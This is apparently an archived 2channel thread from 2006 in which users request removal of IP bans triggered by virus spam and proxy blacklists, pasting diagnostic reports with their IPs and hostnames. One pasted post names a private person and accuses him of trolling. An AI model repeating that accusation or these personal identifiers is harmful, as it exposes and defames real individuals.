軍艦焼 ★さん寛大な対応ありがとうございました。
megaeggですがまだ書き込めないままなのですが。。。
これは自分の日ごろの行いが悪いせい?
>>155 ありゃ。。。
検索してmegaegg.ne.jpのウィルス焼きはあぼーんしておきました。
しばらくしたら書けると思いますのでよろしくです。
>>156 あのー。全部消したんですかー?
範囲焼き以外のは個別に焼いてあるのが沢山あるんですがー。
唖然・・・。
megaeggのウイルス焼き全解除で困らないだろう、156の203.168.110.は範囲焼きだったみたいだし、様子を見ればいい。
>>162 それ以外の範囲にも沢山あったわけでー。
つまり別の感染者がいるってことですー。
IPアドレスの範囲を全然確認してなかったのかなー。
>>156 これちょっと気になるなぁ。
まさかとは思うけど、全部解除しちゃったんか?
>>155のフシアナのIPアドレスは
>203.168.112.0/20
の範囲外の希ガス
sec2chdでは、わいわいがやがや出来るから良いんですよん。
>>165 >>156 えーと、ログ辿って範囲焼き以降に個別に焼いたものはー、
再度焼いておいてくださいー。責任持ってー。
>>170 ちょっと質問いいですか?
範囲焼き以外で個別に焼いたIPも、megaeggである限り
違うIPをちゃっかり取得していたりする場合もあると
思うんですが、それを個別に焼きなおすことに意味あるんですか?
しないよりはマシって程度なのかな。。
megaegg解除ありがとうございます。
だけど、また誰かがウイルス爆撃したら元の木阿弥なんですよね…。
megaeggが解除されて本当に嬉しい。
掲示板の中では、やはり2ちゃんねるが一番楽しいことを
今実感してます。
解除してくれた軍艦焼さんに迷惑をかけないように、ウイルス
には充分に気をつけます。
>>149 漏れも昨日、以下のような返信を貰いました。
>2ちゃんねる掲示板の規制につきまして、弊社より
>管理担当者様へご連絡させていただき、対応させて
>いただきます。
肝心の進展状況の方はどうなんでしょう?
解除は間近なんでしょうか。
>>175 >進展
変わりはないです。
>解除は間近なんでしょうか
諸々含めて、早くともGW明け頃〜かなと思ってます。
(猫が特定へと動くと言い出したのは4月末日。それ以前は静観。)
>>170 ログ見ましたが再度焼きに該当するのはありませんでした。。。
>>176 レスありがと。
取りあえず待つしかないみたいですね。
猫と管理者さんの連携に期待です。
>>178 軍艦焼 ★さんへ
こちらの対応を見て寛大に解除して頂いたのに、
他の方から非難されて心苦しくROMしておりました。
http://halcyan.30.kg/klist/list.php?filepattern=-106-&kwd=&kwd_sv=tmp6.2ch.net&kwd_host=megaegg&kwd_post= 上のリンクには複数のIP出ていますが、
解析の結果単独のユーザーのウイルス書き込みだと報告を頂いております。
もしその他の規制の必要なウイルス書き込みのIP有りましたら
megaegg側に報告の後対処してもらう予定でしたが、
解除の後焼き処スレをずっと見ていましたが今の所
ウイルスによる書き込みがないようので、
megaeggの解析通り単独の感染ユーザーによるものだと
断定しても良いのではないでしょうか?
解除する事によってお手数をお掛けする事になったようですが、
おこがましいですがmegaeggユーザーを代表しましてお礼を申し上げます。
本当にありがとうございました。
>>180 解除以降のが全くないから今のところは問題ないと思います。
#つなぎ変えているのはこちらではわかりませんし。。。
>>181 ちょっと思い違いもあったみたいなんでー、
大変申し訳ありませんでしたー。
公開PROXYからの投稿は受け付けていません!!(Part9)
http://sports2.2ch.net/test/read.cgi/operatex/1139744972/ 上記スレにてウイルス焼きされたと知り、全パソコンをノートンのオンラインチェックでスキャンしましたが感染は見当たりませんでした。
その時は数日ネットを控えてIPを変えて過ごしていたんですが、先程ネット接続が切れた拍子にまたこのIPに戻ってしまいました。
(それまでのIPは218.142.128.76で1週間以上問題無しで過ごせました)
メインのPCはウイルスバスターを入れていて、スキャンもしてみましたが異常は見つかりません。
(プログラムバージョン:14.10.1023 検索エンジン:8.0.1001 パターンファイル番号3.407.00)
サブはAVGでこちらも最新状態に保ってます。
(プログラムバージョン:7.1.392 検索エンジン:268.5.4/332)
問題がないようでしたら解除の方、よろしくお願いします。
>>183 最新版でないようなのでいったん解除してみます。
>>182 いえいえー。
この流れなら言える!
漏れはネコマタで抜きますた。
この流れなら言える!
漏れはネコマタで抜きますた。
ちょ 試しに書き込もうとしたら誤爆!しかも連荘…… (ノД`)
内容が内容だし、テラハズカシス…… 。゚(゚´Д`゚)゚。
先程、無事書き込めますた。
板汚しも含め、お手数おかけして申し訳ございません。
身に覚えのない規制でここに辿り着きやっとわかりました。
皆さんも困っていらっしゃるのですね。私からもstarcatにメールします。
人物特定できたなら早く解除してほしい・・・
>>197 >本件につきましては、現状、弊社にて該当ユーザに対し、対処を
>致しておりますので、今暫くお待ちいただければ幸いでございます。
>ご期待に添えない回答となり、大変恐縮でございますが、何卒
>ご理解賜りますようお願い申し上げます。
昨日の返信です。もう少しの辛抱かと。
ID:ngT45tN+0
香ばしいかもしれません。
>>199 ここは同じIPで規制された人が集まってくるので同じIDが出るのは極普通。
>>198 ありがとうございます。
私の方にもさっそく返事がきました。
お客様は現在プライベートIPをご利用されております。
規制をかけられておりますIPは複数のお客様がご利用に
なられている為、規制解除を依頼いたしましても規制される
原因のお客様が特定されないと直ぐに規制をかけられてしまいます。
プライベートIPは弊社ファイヤーウォール内にありますので、
外部からお客様を特定する事は困難な状態でございます。
お客様のお使いのIPをグローバルDHCPへ変更する事で規制の影響を
受けなくなりますが変更してもよろしかったでしょうか。
グローバルIPアドレスをご利用の場合は、MediaCat内にセキュリティ装置が
ありませんのでお客様ご自身でセキュリティ性を確保いただく必要がございますが、
様々なアプリケーションをご利用いただけます。
なお、グローバルDHCPへ変更の際は通信が切断されますので変更ご希望の場合、
ご希望の変更日時を記載の上返信メールにてご連絡ください。
ご期待に添えないご返答となりまして誠に申し訳ございませんが
何とぞご理解とご協力を頂けます様お願い申し上げます。
グローバルIPにするか、解除まで待つか・・・・
規制の原因の個人特定できたのか、困難なのか・・・・
よくわかりません orz
>>200 把握しました
>>197-198さん、大変申し訳ありませんでした。すいません。
昨日まで書き込めてたのに突然規制・・・
解除お願いしたいんですが方法教えてくだちい
自分でできる限りのことはやってみました。
これで解除してもらえるんでしょうか?
宜しくお願いします!
-- Your diagnosis --
Date of issue: Thu May 11 19:49:41 2006
IP Address:67.185.149.254
RemoteHost:c-67-185-149-254.hsd1.or.comcast.net
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : en-us
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A5%D7%A5%ED%A5%AF%A5%B7%A4%B8%A4%E3%A4%CA%A4%A4%A4%CE%A4%CBPROXY%B5%AC%C0%A9%A4%CB%B0%FA%A4%C3%A4%AB%A4%AB%A4%C3%A4%BF%BE%EC%B9%E7%A4%CE%C2%D0%BD%E8%CB%A1 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; SV1; .NET CLR 1.1.4322)
REMOTE_ADDR : 67.185.149.254
REMOTE_HOST : c-67-185-149-254.hsd1.or.comcast.net
REMOTE_PORT : 17488
-- DSBL --
67.185.149.254 -> Listed(-_-)
-- BBQ --
67.185.149.254 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
67.185.149.254 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
67.185.149.254 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
comcast.netは大手で串もあるから斜めに見る姿勢で、別のIPを獲得するのがいい
205です。
難しいパソコン用語は本当に分からなくて、申し訳ないです…
今海外からなんですけど、やっぱり使えないんですかね…
ケーブルで固定IPじゃないし、とりあえずComcastに電話して聞いてみます!
>>208 知らない単語は調べてみるのが当たり前。
パソコン用語(こんなものは存在しないと思うが)アレルギーか
何か知らないが、単に文章を読もうとしていないだけ。
この辺り読んでみたら。
http://sports2.2ch.net/test/read.cgi/operatex/1145953600/4 >>209 2chに急に書き込めなくなったのが数ヶ月前で、それから何十時間もかけて、理解しようとしたのですが、分からずじまいでした。
私の頭がついていかないのか、アレルギーなのか、文章理解能力がないのか、わかりません。すいません。
いただいたリンク読んでみました。
なんとなく、理解できました。(すいません。なんとなくで。)
DSBLに関しては理解できました!
ここには前から何度かメールしていて、250(これだとOKって意味なんですよね?)といただいたのですが、だからといって、書き込みができるようになったわけではありませんでしたから、どうしたらいいのか…と思っていました。
Comcast自体がだめなのかもしれません。(上の方が仰っていましたし)
やっぱり電話して聞いてみます。
英語は話せるんですけど、こういう事を英語で話すのはとても苦手で、ずっと躊躇していました。
がんばってみます。
教えていただいてありがとうございました。
ComcastはアメリカのCATVでしたっけか。>>210さんの解除申請はComcastの管理者に
メールで送信され、無事に受信されました。“250 ok”はメールサーバがメールを受
け取ったことを意味します。しかし、このメールを管理者が読んでDSBLからの削除を
求めるアクションを起こさないとリストからの削除は行われません。
>>210さんに割り当てられたIPアドレスに対しては2005年12月にも解除申請があり、
Comcastの管理者宛にメールが送られていますが、そのときは解除に至っていません。
どうやらComcastの管理者は解除申請へのリアクションをとらずに無視したようです。
残念ですが、Comcastは解除申請手続きを進めない方針のようです。
そんなわけで、2ちゃんに書き込むには次のような方法が考えられます。
1. DSBLにリストされていないIPアドレスが割り振られるまで頑張る(ケーブルモデ
ムの電源を切って入れ直すなど)
2. Comcast以外のプロバイダを利用する
3. Comcastに対してDSBLの解除申請手続きに応じるよう要求し、それを実行させる
公式p2(http://p2.2ch.net/)を利用するのもひとつの解決策かもしれません……。
えーと、DSBLに載っているホストでも公式p2を利用できるのかな。ご存じのかたがい
らっしゃいましたらぜひ教えてください。
最後に、Comcastは荒らしの隠れ蓑に使われる公開プロキシサーバを運用するユーザー
が多いプロバイダとして有名です。そのために“札付き”として扱われることがあります。
>>207さんはそのことを言っているのでしょう。 >>211 ご親切に、色々教えていただいて本当にありがとうございます!!
こんなに丁寧に教えていただいて、嬉しい限りです。
そうなんです。もう半年近くも2chに書き込みができなくて、辛い思いをしています。
やはりComcast(はい。アメリカです)側に問題があるのかもしれませんね。
やはり電話して、確認を取ってみたいと思います。
本当に色々教えていただいてとても嬉しいです。
>>211さんのコメントをセーブさせてもらいます!
本当に、本当にありがとうございました!
-- Your diagnosis --
Date of issue: Fri May 19 12:58:11 2006
IP Address:210.143.47.164
RemoteHost:d28f2fa4.speednet.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_UA_CPU : x86
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP________ : ----:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP________________ : ----- -------
REMOTE_ADDR : 210.143.47.164
REMOTE_HOST : d28f2fa4.speednet.ne.jp
REMOTE_PORT : 1904
-- DSBL --
210.143.47.164 -> None(^-^)
-- BBQ --
210.143.47.164 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
210.143.47.164 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
210.143.47.164 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
NIS2005でウイルススキャンしたところ「Download.Trojan」が検出されたので駆除しました。
解除の方よろしくおねがいします。
>d28f2fa4.speednet.ne.jp
done.
>>214 書き込みできましたー。
迅速な対応ありがとうございます。
以後ウイルスは踏まないように気をつけます。
お手数おかけしました。
-- Your diagnosis --
Date of issue: Sun May 21 14:36:19 2006
IP Address:210.143.47.172
RemoteHost:d28f2fac.speednet.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_UA_CPU : x86
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP________________ : ----- -------
REMOTE_ADDR : 210.143.47.172
REMOTE_HOST : d28f2fac.speednet.ne.jp
REMOTE_PORT : 2725
-- DSBL --
210.143.47.172 -> None(^-^)
-- BBQ --
210.143.47.172 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
210.143.47.172 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
210.143.47.172 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
>>213で解除依頼したものですが本日12時頃からまた書き込めなくなってしまいました。
NIS2005でウイルススキャンしたところ今回ウイルスは検出されませんでした。
大変お手数おかけしますが再度解除の方よろしくおねがいします。
>>217 210.143.47.0/24という範囲で焼かれてますね
他にも感染者がいるようで
プロバイダさんの方に何らかの対処をしてもらうよう頼んでみるとかしてみてください
>>218 なるほど。了解しました。
プロバイダに対応してもらうように連絡してみます。
別スレに要望されてたので転載ですが解除願います。
596 名前: [―{}@{}@{}-] TTN202-127-81-28.ttn.ne.jp[sage] 投稿日:2006/05/22(月) 18:24:03 ID:/Dx7C7hE0
以前にウイルス焼きされ、プロバに連絡していたのですが、ようやく返信がありました。
>ユーザーの方にはメールにてウィルス感染の有無を確認していただき、
>ご使用のパソコンが感染してしまっていた場合、
>速やかに適切な処置を講じていただくようお願いいたしておりましたが
>状況の改善が見られない為、
>当社では、他のお客様への影響を最小限にとどめるため、該当ユーザを共有ホストから除外いたしました。
との返事を頂きました。
規制解除して頂けませんでしょうか?
よろしくお願い致します。
>>220 TTN202-127-81-28.ttn.ne.jp(202.127.81.28)
解除してみました。
>>217で報告したものですがプロバイダに連絡してみたところ以下のような返事がきました。
■私から連絡したメールの内容
>「210.143.47.0/24」のIPアドレスを使用される全てのユーザに対してウイルス
>チェックをして駆除していただかない限り書き込み制限が解除されない
>ようです。ユーザ全員にウイルスチェックをしていただくメールを送って
>いただくことは無理でしょうか?
■プロバイダからの返信内容
>ウイルス感染等に関して該当者が特定できない状況での対応はいたしかねます。
>
> ※弊社では、グローバルIPアドレスを1契約につき1つ、動的に割り当て
> させていただいておりますので、接続ごとにIPアドレスが更新されます。
> その為、該当者を特定する為には、該当のIPアドレスでのアクセスが
> 行われた具体的な日時が必要となります。
>
> つきましては、ご利用サイトの管理者まで、該当の特定ができる「IPアドレス」
> 「日時」等の記録をご確認のうえ、スピードネット公序良俗対応窓口まで
> ご連絡くださいますよう、お願いいたします。
上記の内容について対応していただくことは可能でしょうか?
宜しくお願いします。
>>225 なるほど。了解しました。
プロバイダにリストを送って対応をお願いしてみます。
784 名前:優しい名無しさん[sage] 投稿日:2006/05/25(木) 23:42:01 ID:t67mEnCR
☆TAC★=岡野拓実
ほかにもたくさんの偽名あり
ディズニーのほかアニメ、同人誌、いろんなことに
首つっこんでいる
昔、携帯電話に凝っていて
掲示板荒らしで有名
携帯電話を通販販売していたこともある
その掲示板で叩かれていた
UUF-TACでググってみそ
http://www.uuf-gln.ne.nu/vtc メンヘルで生活保護24
http://life7.2ch.net/test/read.cgi/utu/1144592166/ 壮絶母乳奉行◆rvZHK0tCk6ふぐり茶漬けゲボリ晴◆77dp4EiJEYとりこも茄子膣炎◆D1F7/JoKEc
プロレス板ノアスレを荒してる人です。選手・ファンを中傷する書き込みを毎日二十四時間一ヵ月以上し続けています。助けて下さい
>>229 見えない人には話しかけない事^^;
はい、次の人どうぞ
-- Your diagnosis --
Date of issue: Sun May 28 09:36:45 2006
IP Address:202.248.88.153
RemoteHost:sechttp613.sec.nifty.com
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CACHE_CONTROL : max-age=259200
HTTP_CONNECTION : keep-alive
HTTP_REFERER :
http://qb5.2ch.net/sec2chd/ HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
REMOTE_ADDR : 202.248.88.153
REMOTE_HOST : sechttp613.sec.nifty.com
REMOTE_PORT : 45758
-- DSBL --
202.248.88.153 -> None(^-^)
-- BBQ --
202.248.88.153 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
202.248.88.153 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
202.248.88.153 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
原因がウイルスだといわれたのでスキャンしたのですが
検出されませんでした
-- Your diagnosis --
Date of issue: Sun May 28 13:58:50 2006
IP Address:218.231.174.27
RemoteHost:218.231.174.27.eo.eaccess.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
REMOTE_ADDR : 218.231.174.27
REMOTE_HOST : 218.231.174.27.eo.eaccess.ne.jp
REMOTE_PORT : 1226
-- DSBL --
218.231.174.27 -> Listed(-_-)
-- BBQ --
218.231.174.27 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
218.231.174.27 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
218.231.174.27 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
PROXYじゃないんですけど、規制されました
解除お願いします
えーと、ウイルスによる爆撃は仕様変更で
大丈夫になったみたいなのでー、
範囲焼きにしてたものは一部削除しましたー。
共有ホストでウイルス焼きされてるものはー、
申請があったら順次解除してみてくださいー。
その他についてはー、新種が出てきたらまたその
パソコン感染するかもしれませんしー、様子見でー。
爆撃中のホストは解除するとまずげな予感がします
691 root▲ ★ sage New! 2006/05/28(日) 13:01:28 ID:???0 BE:?-#
>>688 comic6 と tmp6 は、両方とも今回の件で
ウイルスがバグってループになったっぽい気がしますね。
bbs.cgi 叩かれまくりか。
新しい環境でも書けているウイルスは存在するのかしら。
http://qb5.2ch.net/test/read.cgi/operate/1145114275/691 >>235 私は
>>231ですが
もう解除していただけるということでしょうか?
bbs.cgi 叩かれるのはBBQじゃどうしようもないし
めんどくさいからピッチャーdenyに登場していただこう
>>237 関係ないですー。
BBQはbbs.cgiの中で判定されますからー。
>>242 ありがとうございます
やっと普通に書き込める・・・
-- Your diagnosis --
Date of issue: Thu Jun 1 00:29:20 2006
IP Address:210.149.120.126
RemoteHost:ca6-nat.cty-net.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja,en-us;q=0.7,en;q=0.3
HTTP_CONNECTION : keep-alive
HTTP_USER_AGENT : Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; ja-JP-mac; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
REMOTE_ADDR : 210.149.120.126
REMOTE_HOST : ca6-nat.cty-net.ne.jp
REMOTE_PORT : 12917
-- DSBL --
210.149.120.126 -> None(^-^)
-- BBQ --
210.149.120.126 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
210.149.120.126 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
210.149.120.126 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
誘導されて来ました。
ここ1週間程書き込めません。
ウイルスチェックもしましたが、検出されませんでした。
解除、出来ましたら宜しくお願いします。
すいません。
たった今【DSBL】PROXY規制中!【報告無用】40の方で
解除して下さったようです。
お邪魔致しました<(_ _)>
-- Your diagnosis --
Date of issue: Sun May 28 09:36:45 2006
IP Address:202.248.88.153
RemoteHost:sechttp613.sec.nifty.com
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CACHE_CONTROL : max-age=259200
HTTP_CONNECTION : keep-alive
HTTP_REFERER :
http://qb5.2ch.net/sec2chd/ HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
REMOTE_ADDR : 202.248.88.153
REMOTE_HOST : sechttp613.sec.nifty.com
REMOTE_PORT : 45758
-- DSBL --
202.248.88.153 -> None(^-^)
-- BBQ --
202.248.88.153 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
202.248.88.153 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
202.248.88.153 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
>>231ですが、また規制されてしまいました。
解除お願いします。
>>244 個別にウイルス焼きしたsechttp***.sec.nifty.comにつき
すべて解除しても良いでしょうか?
問題なければ解除しますが。
現在
>>249のHOSTも含め4件あり、それぞれ期間は2ヶ月くらいあります
個別にウイルス焼きされていたsechttp***.sec.nifty.com
につきすべて解除致しました。
全く同様の件+5件ありましたが同様に処理いたしました。
みんな、星猫へメールしてるみたいだけど、
どんな内容でメールすればいいのかな。
「2chに書き込めないのですが」と素直に書けばいいのかな?
私は出来るだけの事はしましたが、解除されません。
PROXYじゃないのに勝手に・・・・。
解除お願いします^^
お願いします
-- Your diagnosis --
Date of issue: Tue Jul 4 23:33:29 2006
IP Address:59.87.121.188
RemoteHost:59x87x121x188.ap59.ftth.ucom.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : keep-alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A5%D7%A5%ED%A5%AF%A5%B7%A4%B8%A4%E3%A4%CA%A4%A4%A4%CE%A4%CBPROXY%B5%AC%C0%A9%A4%CB%B0%FA%A4%C3%A4%AB%A4%AB%A4%C3%A4%BF%BE%EC%B9%E7%A4%CE%C2%D0%BD%E8%CB%A1 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
REMOTE_ADDR : 59.87.121.188
REMOTE_HOST : 59x87x121x188.ap59.ftth.ucom.ne.jp
REMOTE_PORT : 1329
-- DSBL --
59.87.121.188 -> None(^-^)
-- BBQ --
59.87.121.188 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
59.87.121.188 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
59.87.121.188 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
私
>>261ですが広告荒らしした覚えありませんし
広告荒らしスレで私のIPを確認しましたがありません。
どういうことでしょうか?
>>264
有線は今年からドメイン変わってるからでしょ。
usen-59x87x121x188.ap-US02.usen.ad.jp
↓
59x87x121x188.ap59.ftth.ucom.ne.jp (59.87.121.188) すいません
>>261>>264です。
思い出しました。ちょうど1年前に規制されました。
その後、禁断の壺に入会して普通にカキコできるようになってたのですが・・・
突然、昨日からカキコできなくなりました。
どういうことでしょうか?
>>267 たびたびすいません。
どうやって確認できますかね?
いちお禁断の壺には入れてて前スレとかも普通に見れます。
ただ書きこめません。
●自分は使ってないんでわからわんわ、すまそ。
下記で聞いてみては?
【規制議論板】質問でも雑談でもOKのスレッド★67
http://qb5.2ch.net/test/read.cgi/sec2chd/1150163228/ さきほどパソコンをたちあげ投稿しようとしたところ、
ERROR:公開PROXYからの投稿は受け付けていません!!(1)
ホスト231.210.12.221.megaegg.ne.jp
名前: 花と名無しさん
E-mail: sage
内容:
test
とでました。
連投はしていませんし、変な書き込みをした覚えもなく、
突然のことに戸惑っております。
書いた板は少女漫画板ですが、ダンス板なども書けない様です。
時間をおいたらまた書けるものなのでしょうか…?
>>272 >>273さんの誘導してくれたスレへ行く
テンプレを読んでその通りに実行
くれぐれも診断書をそのスレにコピペとか余計なことはしないでください
>>273 >>274 失礼しました。
ありがとうございます、
行ってきます。
ワールドカップの掲示板には書き込めるのに他のには書き込めません。
-- Your diagnosis --
Date of issue: Thu Aug 3 22:50:31 2006
IP Address:218.115.254.27
RemoteHost:softbank218115254027.bbtec.net
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
REMOTE_ADDR : 218.115.254.27
REMOTE_HOST : softbank218115254027.bbtec.net
REMOTE_PORT : 4236
-- DSBL --
218.115.254.27 -> None(^-^)
-- BBQ --
218.115.254.27 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
218.115.254.27 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
218.115.254.27 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
連投すみません。
>>280の者ですが、解除の方お願いします。
ただお願いされても必要があるから焼かれているわけで
原因は半角二次元板へのウイルスによる爆撃
というわけで駆除してきてくださいね
えーとマルチで申し訳ないんですがここでいいんですかね
先ほど124.255.177.247でBBQ食らったんですが俺は感染してませんのでお暇なときにでも適当に解除願います
今のところIP変えてますが
爆撃食らってるスレに書いたのがまずかったのかなぁ
すいません
手芸・ハンドクラフト板でウイルスに感染してしまいました。
IEでミシンすれを閲覧しようとしたところアラートが・・・
昨日からです。ラヴレターとかいうやつです
運用情報板に報告したらこちらの板へいけと言われました。
見たいのですが開くと感染してしまい見れません。
たしけて
>>285 焼かれている回線で、フシアナしてここに書いてみて
>>286 ご自分でウイルス対策ソフトを使って削除してください。
>>287 プロバイダは同じでルータ再起動しちゃったので同じIPは再現できないです
とりあえず現IPで節穴しときます
2chのスレッツドを閲覧しようとしただけで
ウイルス感染は無いです。
唯一例外としては、専用ブラウザに付いている
外部からの画像リンク自動読み込み(画像リンクがサムネ表示される)機能をONにしていると
画像ファイルにウイルスが仕込まれていた場合、
自動的に取り込んでしまうというのはありますが、OFFにして於けば良いだけです。
おそらく貴方の場合
お使いのアンチウイルスソフトが誤作動しただけでしょう。
いずれにしてもスレ違い。
参考に
ノートン入れたら2chに書きこめない人へ
(
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8)
>>285 その書き込みのアドレスを貼っておけば?
もう3回も削除してます。
でもそのあと開くとまた感染してしまいます。
パソコンくわしくないので・・・
>>294 いや、たとえdat落ちしてたとしても、
ウイルスによる投稿と誤解されたのでなければ焼かれないわけだから。
それっぽい(ウイルスのふりをしてわざとふしあなしたとか)そういうのがあれば、
それを貼ってくれれば解除もしやすいかと。
そういうことです。
>>295 じゃあそのスレのアドレス貼って。
見てくるから。
ただのノートントラップじゃん
ノートン以外でも警告出るウィルスソフトもあるよ
というかウィルス対策のソフト何使っているのか書けよ
>>286 どうしても見たければスレ開くときだけウィルスソフト切っておけ
んでもう帰ってくるな
http://hobby8.2ch.net/test/read.cgi/craft/1130510542/719 こうやってレス番号を指定しないと運営さんは見にいかない。
人の手を煩わせているという意識を持たないとここでは誰も
動かないよ。
尤も、これをウイルスだと思ってビクビクしている内は2chなど
利用しない方が身のためです。
正直、貴女にはここより大手小町の方が役立つでしょう。
>>300 さん
>>298をみて。
スレッド観たけれど何の問題もなし、貴方の使ってるウェアの問題。
巻き添えです。すぐじゃなくていいので解除してください。
-- Your diagnosis --
Date of issue: Fri Aug 4 19:58:07 2006
IP Address:218.224.151.215
RemoteHost:i218-224-151-215.s02.a005.ap.plala.or.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : keep-alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
REMOTE_ADDR : 218.224.151.215
REMOTE_HOST : i218-224-151-215.s02.a005.ap.plala.or.jp
REMOTE_PORT : 3181
-- DSBL --
218.224.151.215 -> None(^-^)
-- BBQ --
218.224.151.215 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
218.224.151.215 -> La ROCA es la vida.(-_-)
-- Tor(an anonymizing overlay network for TCP) --
218.224.151.215 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:close
PORT 1080: Result:close
PORT 3128: Result:close
PORT 8000: Result:close
PORT 8080: Result:close
PORT 8888: Result:close
「ERROR:公開PROXYからの投稿は受け付けていません!!(1) 」
が出て書き込めない状態になってしました。
宇治金時ウィルスでしょうか・・・?
-- Your diagnosis --
